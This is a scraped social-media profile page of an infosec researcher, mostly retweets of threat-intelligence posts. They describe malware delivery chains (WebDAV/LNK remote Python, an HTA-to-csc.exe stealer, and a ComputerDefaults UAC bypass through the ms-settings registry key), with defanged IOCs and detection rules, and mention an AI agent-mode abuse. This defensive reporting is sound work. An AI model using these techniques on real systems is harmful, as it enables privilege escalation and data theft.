alex

@4ayymm

birdup (new bird)

🫂

Joined September 2020

589 Following

74 Followers

29 Posts

alex @4ayymm

5 months ago

@ethannestor https://t.co/LHQOTPryJy Your best option

904

4ayymm retweeted

Red Canary, a Zscaler company

@redcanary

8 months ago

NEW: In what we've dubbed an "AI-in-the-middle attack," an adversary could abuse agent mode in commercial AI products to perform actions on behalf of a user. 🤖 🧑‍💻 Read our latest research for example malicious prompts and detection guidance: https://t.co/QuPHtpHJGj

redcanary's tweet photo. NEW: In what we've dubbed an "AI-in-the-middle attack," an adversary could abuse agent mode in commercial AI products to perform actions on behalf of a user. 🤖

🧑‍💻 Read our latest research for example malicious prompts and detection guidance:
https://t.co/QuPHtpHJGj https://t.co/uKoXtsDFkx

830

alex @4ayymm

about 1 year ago

@Oddvarmoe @HackingLZ https://t.co/7s4aSL27id I mean, he does have some credibility he has some classics like "Hacking a computer with an image JPG reverse shell from kali linux on windows pc"

308

4ayymm retweeted

13Cubed

@13CubedDFIR

almost 2 years ago

If you've been considering Investigating Windows Endpoints, someone published a new blog post comparing the course to FOR500. It's filled with great information! Check it out here: https://t.co/eI11qvPccl #DFIR

139

10K

Who to follow

infosec , blue teamer,

@TLPAmberAle

Something something InfoSec something something not logged by default

4ayymm retweeted

Outflank @OutflankNL

almost 2 years ago

Who’s the real #GrimResource? Spoiler: It’s us! 😏 Here's our latest blog on using MSC files for initial access: https://t.co/aQ0Of11pU8 Fun fact: @elastic’s post on this technique came from a sample caught by a blue team, originally used by a red team through our OST offering.

OutflankNL's tweet photo. Who’s the real #GrimResource? Spoiler: It’s us! 😏

Here's our latest blog on using MSC files for initial access: https://t.co/aQ0Of11pU8

Fun fact: @elastic’s post on this technique came from a sample caught by a blue team, originally used by a red team through our OST offering. https://t.co/mD2zVl8UbZ

115

16K

alex @4ayymm

about 2 years ago

@AzakaSekai_ this is how.

601

25K

alex @4ayymm

about 2 years ago

@13CubedDFIR Linux memory next?

322

4ayymm retweeted

ANY.RUN

@anyrun_app

about 2 years ago

👋 Today we have a guest post from @4ayymm on the malicious Python over #WebDAV (T1059.006) Adversaries may abuse Python commands and scripts for execution. ⛓The delivery sequence: 1️⃣ Embed Malicious JavaScript: A website contains malicious JavaScript that tricks users into opening a file; 2️⃣ Enable Remote Connection: The code manipulates users into enabling a remote connection via the 'search-ms' function; 3️⃣ Connect to WebDAV Directory: The connection leads to a WebDAV directory on an external server; 4️⃣ Disguise LNK File: A LNK shortcut file in the directory is disguised as a harmless PDF document; 5️⃣ Open LNK File: Opening the LNK file establishes communication with a remote Python binary for Windows; 6️⃣ Execute Malicious Script: The #Python binary executes a remotely hosted malicious Python script. 🧐 Detection Opportunities Monitor connections to remote UNC paths Monitor for any remote execution over a UNC path 🔍 #IOCs Mfa-files[.]firstcloudit[.]com postfix-mail[.]firstcloudit[.]com *[.]firstcloudit[.]com kjskrvmwerffssd[.]kozow[.]com 172[.]114[.]170[.]18 Mfa-files[.]firstcloudit[.]com postfix-mail[.]firstcloudit[.]com *[.]firstcloudit[.]com kjskrvmwerffssd[.]kozow[.]com 172[.]114[.]170[.]18 See the Sample 👇 https://t.co/a6wOrdvL1P

anyrun_app's tweet photo. 👋 Today we have a guest post from @4ayymm on the malicious Python over #WebDAV

(T1059.006) Adversaries may abuse Python commands and scripts for execution.

⛓The delivery sequence:

1️⃣ Embed Malicious JavaScript: A website contains malicious JavaScript that tricks users into opening a file;
2️⃣ Enable Remote Connection: The code manipulates users into enabling a remote connection via the 'search-ms' function;
3️⃣ Connect to WebDAV Directory: The connection leads to a WebDAV directory on an external server;
4️⃣ Disguise LNK File: A LNK shortcut file in the directory is disguised as a harmless PDF document;
5️⃣ Open LNK File: Opening the LNK file establishes communication with a remote Python binary for Windows;
6️⃣ Execute Malicious Script: The #Python binary executes a remotely hosted malicious Python script.

🧐 Detection Opportunities

Monitor connections to remote UNC paths
Monitor for any remote execution over a UNC path

🔍 #IOCs

Mfa-files[.]firstcloudit[.]com postfix-mail[.]firstcloudit[.]com *[.]firstcloudit[.]com kjskrvmwerffssd[.]kozow[.]com 172[.]114[.]170[.]18
Mfa-files[.]firstcloudit[.]com
postfix-mail[.]firstcloudit[.]com
*[.]firstcloudit[.]com
kjskrvmwerffssd[.]kozow[.]com
172[.]114[.]170[.]18

See the Sample 👇

https://t.co/a6wOrdvL1P

4ayymm retweeted

The DFIR Report

@TheDFIRReport

about 2 years ago

From OneNote to RansomNote: An Ice Cold Intrusion 🌟Analysis & reporting completed by @iiamaleks, @IrishD34TH, and @Miixxedup 🎵Audio (New Voice!): Available on Spotify, Apple, YouTube and more! 🏹Services: https://t.co/k8UVEOdKTQ 📚Report: https://t.co/Ll3pwfh9fp

173

45K

4ayymm retweeted

ANY.RUN

@anyrun_app

about 2 years ago

#FakeJami 🔺 (T1218.005) Adversaries use mshta.exe to run malicious .hta files and scripts by exploiting a trusted Windows utility. Various threats employ mshta.exe for initial compromise and code execution. 🔺 (T1027.004) Adversaries can obfuscate #payloads by delivering uncompiled code files to victims, evading analysis and protections targeting executables/binaries. These files require compilation prior to execution, typically through native utilities such as csc.exe or GCC/MinGW. 🔺 The "FakeJami" execution chain starts with a malicious HTA file, which triggers a PowerShell script to contact "seedchicago[.]co[.]ke" and download "absurd.bin". This file is then piped into "uar3fnt0.cmdline". The transition to "uar3fnt0.cmdline" prepares the malware for its next action, avoiding detection. The process culminates with "uar3fnt0.cmdline" being compiled and executed by the C# compiler (csc.exe), deploying the final payload designed for information theft. This sequence demonstrates the #malware methodical use of system tools and Internet resources to achieve its goal of extracting sensitive data from the targeted system. 🕵️‍ Detection options: ------------------ Monitor execution paths for csc.exe Monitor child processes for hta files Monitor the creation of .cmdline files 🔷 IOCs: ------------------ Vicdakenya[.]org seedchicago[.]co[.]ke 209[.]188[.]7[.]251 58b29a63dc11231e362ac37d028bdc024b5f5014943f0ddc69709fedcd58cab1 5b9708704a61f43b4ed3432c650ef3ec694e2ecfbf70bfa410db2a545a7730a0 🔍 See the Sample 👇 https://t.co/IRSuFVJJYS

anyrun_app's tweet photo. #FakeJami

🔺 (T1218.005) Adversaries use mshta.exe to run malicious .hta files and scripts by exploiting a trusted Windows utility. Various threats employ mshta.exe for initial compromise and code execution.

🔺 (T1027.004) Adversaries can obfuscate #payloads by delivering uncompiled code files to victims, evading analysis and protections targeting executables/binaries. These files require compilation prior to execution, typically through native utilities such as csc.exe or GCC/MinGW.

🔺 The "FakeJami" execution chain starts with a malicious HTA file, which triggers a PowerShell script to contact "seedchicago[.]co[.]ke" and download "absurd.bin". This file is then piped into "uar3fnt0.cmdline". The transition to "uar3fnt0.cmdline" prepares the malware for its next action, avoiding detection. The process culminates with "uar3fnt0.cmdline" being compiled and executed by the C# compiler (csc.exe), deploying the final payload designed for information theft. This sequence demonstrates the #malware methodical use of system tools and Internet resources to achieve its goal of extracting sensitive data from the targeted system.

🕵️‍ Detection options:
------------------
Monitor execution paths for csc.exe
Monitor child processes for hta files
Monitor the creation of .cmdline files

🔷 IOCs:
------------------
Vicdakenya[.]org
seedchicago[.]co[.]ke
209[.]188[.]7[.]251
58b29a63dc11231e362ac37d028bdc024b5f5014943f0ddc69709fedcd58cab1
5b9708704a61f43b4ed3432c650ef3ec694e2ecfbf70bfa410db2a545a7730a0

🔍 See the Sample 👇

https://t.co/IRSuFVJJYS

12K

4ayymm retweeted

ANY.RUN

@anyrun_app

over 2 years ago

📌 Blank Grabber: #UAC Bypass Thanks to Alex @4ayymm for this amazing finding! Let's dive in: #BlankGrabber, the self described “The most powerful #stealer written in Python 3 and packed with a lot of features.” One of these key features is UAC bypass methods baked into the execution. ❗️ (T1548.002) Adversaries may bypass UAC mechanisms to elevate process privileges on the system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. ⚙️ This sample utilizes ComputerDefaults.exe to sideload its payload bypassing UAC. This is done by writing to the HKCU:\software\classes\ms-settings\shell\open\command subkey which can be used to specify an action when a settings app is invoked. Then, the payload is set to "DelegateExecute." This is a registry entry used by Windows to delegate execution to a specified CLSID, which is part of the COM (Component Object Model) architecture. 📡 Detection Opportunities Monitor registry writes to the “HKCU:\\software\\classes\\ms-settings\\shell\\open\\command" subkey Below is regex to help your hunting/detection. (reg .* hkcu\\Software\\Classes\\ms\-settings\\shell\\open\\.*) ⚙️ Bypass UAC using ComputerDefaults (PowerShell) https://t.co/ufIIkJeBwY 🛰️ IOC's 5e455f6e81774b115d394ccf62b51afe52ecf0504a394ba9c5146550117f0acc ad61f892fa84ba1242f409e82f7e6c4742b58ecbbbd3151fc2d20a9f7b894b58 6ae6c801471f9a6748f4468f6986d22935b23dcee5ff18b6df104c19f522d480 147[.]185[.]221[.]17 🔎 See the Sample ↘️ https://t.co/Av1ovYalXJ

$anyrun_app's tweet photo. 📌 Blank Grabber: #UAC Bypass Thanks to Alex @4ayymm for this amazing finding! Let's dive in: #BlankGrabber, the self described “The most powerful #stealer written in Python 3 and packed with a lot of features.” One of these key features is UAC bypass methods baked into the execution. ❗️ (T1548.002) Adversaries may bypass UAC mechanisms to elevate process privileges on the system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. ⚙️ This sample utilizes ComputerDefaults.exe to sideload its payload bypassing UAC. This is done by writing to the HKCU:\software\classes\ms-settings\shell\open\command subkey which can be used to specify an action when a settings app is invoked. Then, the payload is set to "DelegateExecute." This is a registry entry used by Windows to delegate execution to a specified CLSID, which is part of the COM (Component Object Model) architecture. 📡 Detection Opportunities Monitor registry writes to the “HKCU:\\software\\classes\\ms-settings\\shell\\open\\command" subkey Below is regex to help your hunting/detection. (reg .* hkcu\\Software\\Classes\\ms\-settings\\shell\\open\\.*) ⚙️ Bypass UAC using ComputerDefaults (PowerShell) https://t.co/ufIIkJeBwY 🛰️ IOC's 5e455f6e81774b115d394ccf62b51afe52ecf0504a394ba9c5146550117f0acc ad61f892fa84ba1242f409e82f7e6c4742b58ecbbbd3151fc2d20a9f7b894b58 6ae6c801471f9a6748f4468f6986d22935b23dcee5ff18b6df104c19f522d480 147[.]185[.]221[.]17 🔎 See the Sample ↘️ https://t.co/Av1ovYalXJ$

4ayymm retweeted

Grzegorz Tworek

@0gtweet

over 2 years ago

I really like the consistency and uniformity of Windows. 😅 ConDrv can be managed via: 1. IOCTLs such as IOCTL_CONDRV_READ_IO, 2. IOCTL_CONDRV_ISSUE_USER_IO containing the command in ApiNumber field, 3. NtUserConsoleControl/ConsoleControl() with CONSOLECONTROL enum as a command.

4ayymm retweeted

Phill Moore @phillmoore

over 2 years ago

I made a thing, based on the excellent work of other people and some of my own experience. It's ok for a v1, but it still needs work to make it more useful. I'm still learning proper source management, so it's a start #DFIR https://t.co/yGED3pObrZ

279

135

152K

4ayymm retweeted

Grzegorz Tworek

@0gtweet

over 2 years ago

I've decided to offer a special promotion for a few days, giving a 40% discount on my Mastering Windows Internals course. It includes six crucial modules, each 90 minutes long, providing a balance of theory and practice. I hope you will like it. :) Link below ⤵

113

49K

4ayymm retweeted

Florian Hansemann @CyberWarship

over 2 years ago

"JonMon" #infosec #pentest #redteam https://t.co/pn0CZCmgy8

4ayymm retweeted

Jonny Johnson

@JonnyJohnson_

over 2 years ago

It’s very common for us to see offensive tooling enable SeDebugPrivilege so that they may bypass certain OS checks. However, what does this mean? Which OS checks are skipped? I dove into this and decided to write a blog on it. Check it out! https://t.co/c7pEs48zTF

246

110

49K

alex @4ayymm

about 3 years ago

@JollyMineCraftr @SRifqi @_JohnHammond Yeah Im not hosting anything now

alex @4ayymm

over 3 years ago

@0xFalconSpy @offsectraining Thanks for all you did! The discord was the only way I got through pen200.

320

alex

@4ayymm

Who to follow

Last Seen Users on Sotwe

Trends for you

Most Popular Users